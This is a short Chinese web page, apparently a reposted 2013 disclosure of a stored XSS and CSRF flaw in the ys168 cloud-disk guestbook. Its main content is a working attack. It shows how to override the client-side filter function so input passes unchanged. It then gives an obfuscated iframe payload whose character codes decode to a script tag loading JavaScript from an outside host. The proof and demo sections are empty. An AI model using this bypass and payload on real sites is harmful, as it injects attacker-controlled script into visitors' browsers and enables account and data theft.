• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    ys168网盘系统留言板存储型xss+csrf

    时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

    留言内容没有服务端过滤。
    重构zfaq 函数即可。
     
    function zfaq(str) {
        return str;
    }
    然后本地提交。
    内容代码为
     
    </textarea><iframe/onload=”javascript:write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,116,109,120,107,46,111,114,103,47,113,46,106,115,62,60,47,115,99,114,105,112,116,62))“>
     
    漏洞证明:

    演示地址:



    ,www.xuhantao.com,涛涛电脑知识

  • 上一篇:如何防止网站被入侵
  • 下一篇:nginx下目录禁止执行PHP脚本
    • 相关文章
    • 没有相关文章
    共有评论 0相关评论
    发表我的评论
    • 大名:
    • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1